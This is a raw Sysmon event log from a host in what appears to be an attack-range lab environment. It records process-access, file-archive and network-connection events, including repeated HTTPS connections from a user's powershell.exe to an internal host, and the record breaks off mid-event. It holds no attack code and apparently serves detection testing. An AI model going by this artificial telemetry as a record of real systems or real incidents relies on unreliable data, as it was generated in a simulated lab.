15:02:32.510{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7388-613B-4BB4-03000000C801}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7388-613B-4BB4-03000000C801}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.507{B81B27B7-7388-613B-4BB4-03000000C801}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=308787432210C6AB32B2B3289E5A54C0,SHA256=F0D8F9203955978A51353B26F9B687F5F2F3DC5D3F71829E9162B91BA1E2DEFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BB6E963F618E62A5B11FCB1795342FC,SHA256=CE34EF3689012F7791BD6521B316AC2FBD8F7FB60D30DDC7A1B3522BBDD315A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.074{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47EEC26AF0D0C6BCFD11506B55865D4C,SHA256=3E63C41A5F60997BA7A61B94E8C2B8C7D6D2AC80960800A961ABF6F687309F11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.011{B81B27B7-7387-613B-4AB4-03000000C801}65485468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:33.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F6047EEC2D3AEF6E7D802F790D7022E9,SHA256=E37DCD626CECEBB40B44D02020616DC20A85191F8FE4015DF7CA49D4C8607CD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:33.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=308787432210C6AB32B2B3289E5A54C0,SHA256=F0D8F9203955978A51353B26F9B687F5F2F3DC5D3F71829E9162B91BA1E2DEFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:33.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40597FE5A5CB7DBDC9DF364E4B7C5918,SHA256=70A1C0D3257678AA1BD940A9A6B7F248380A64233EA8278868A82903DE7405B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:34.124{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:34.124{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:34.124{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:34.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41AD45DE3D3C524B581AAA24F3A9076,SHA256=42AD433EFC5269FB66BDFEA968730DA8D7FA84738E5975BD1FAAEDF6DA30B24B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:59.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52497-false10.0.1.12-8000- 23542300x800000000000000035343051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:35.139{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCFFAA243A67D42FF7C168D5D4AAD025,SHA256=D3E4C4F2B81D47664A4729EC1F3FBE30C8F068504FED9722BC09150CD8B6843F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:59.860{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52498-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:36.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEA1CF89B46CAC921E13154371F1A90,SHA256=36CE76397F3CEECBDA646D55AA10A3E2290F34A71DC31CA2411451825141EC4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:37.552{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5AA9238A6C1604A3FE8EADF0B8316F89,SHA256=F728CBA317012F13B750AFBF1DECEAE407B8812C5D2DE6DD7D5C2C2E1F82581F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:37.552{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5A803CA90F42914409D812AD1A191081,SHA256=521CFDE806E7B101008C0F2E4F8044848FFEE197F721584995DAEB1190F7CF34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:37.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C66106CA186FDDCC1F184681DCDFA2,SHA256=6B902AF6CE983BEBB8D9CAF173D1A7A3A8F74D3C9435E781D4F0D58E27F29B78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:38.205{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43C580266E3770B2D6A2D4481C601081,SHA256=12DFC888E6BFBA9FA680FDF36FBCBA209B144D2AB0B33180B492954497F91C46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.255{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52499-false10.0.1.12-8000- 23542300x800000000000000035343057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:39.235{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C65F288BCA664EA71CACDD1438C1D6,SHA256=9E785EC5AB4A29CE050A78601C9D114D5FEBE2D937CA03724B389AF61F4FACCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:40.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=056BED604EB7A8E19FDBC26EBCF0D3C4,SHA256=D21062B2D66B900D13B65028F8B9B6001062423DB2AD0840900384F38FB32BCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:40.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C44517BA1DBF842F0E3CDF9A5D0E9CBA,SHA256=571E3E5BCCC0AA1B5EDDAC59E045BDA76034897895491231804B5CF0EDB0468F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:05.870{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52500-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:41.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF82CA4E11650EF804479827A9F3E8C4,SHA256=B5B3EBA0A3E00959EDF124C5DCA7D9AEA18AB87AB291986FCC87F6FA0A588E7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:42.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E16AB1D8DF3A332A6D2F4794931E86,SHA256=80A06E883F6F064B2A4EBF0073F684DA7208D43167A111465D7243172AE4FD13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:43.550{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE5CFE680C5BD5DE81F522BCA4ABD463,SHA256=DF5994394FD1D14FD71737AD348DA7E039DB8EDB37BF7B53B70C455D7AB50253,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:44.898{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=80A8AD47CECC44AD6798AFE4045AE889,SHA256=3AF8C9CD151A6F82AB91728F4C228AFD881DD39A959240713A62E388DF36741B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:44.551{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC29E6272313DAC975F92A9027CDB372,SHA256=D2913841CD2B3D57E713FF6894836E7E63674BA18C081AE845B903BE6853D008,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:45.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=98CF033911078E01A1ECBB41A5418E59,SHA256=911304E0D43A4369EFCEA8FD50666EA3065C8B949DCAEAB79DD993C01DF87C72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:45.581{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1EF0AAF9AD105929291ADF28B0B0FB,SHA256=722A78DA16FF4B9EE55250ED326C009B18BC97B45F3DF32EC1088530E0EA2106,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:10.138{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52501-false10.0.1.12-8000- 23542300x800000000000000035343070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:46.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4453DCD8CD879FEBF90F65768CB5F975,SHA256=AC5CA7543F0B453CB6E00F98993EC2D93989D4105E86CF3F19DD366F4C5487CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:47.616{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345374EBC18320987E4AB3F5917083E9,SHA256=848D77DE69E64ADB17E2258683DCB677CEBF6227A8B58F4CEDD7FED59CE3D814,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:11.885{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52502-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:48.647{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D34C76B8BC88640F039DFEDF19B499D,SHA256=E53991CD4092B89F1E31B59077AE9E1EEA0792750E6ABFB148A6A84D0BEF44DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:49.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=321B9F36F059BAB10EC6D38D35B237B6,SHA256=AF82A8022974D8764FE56D88A9A611D15DE4CC166CF42A18940DCDC4AC69E2B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:49.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 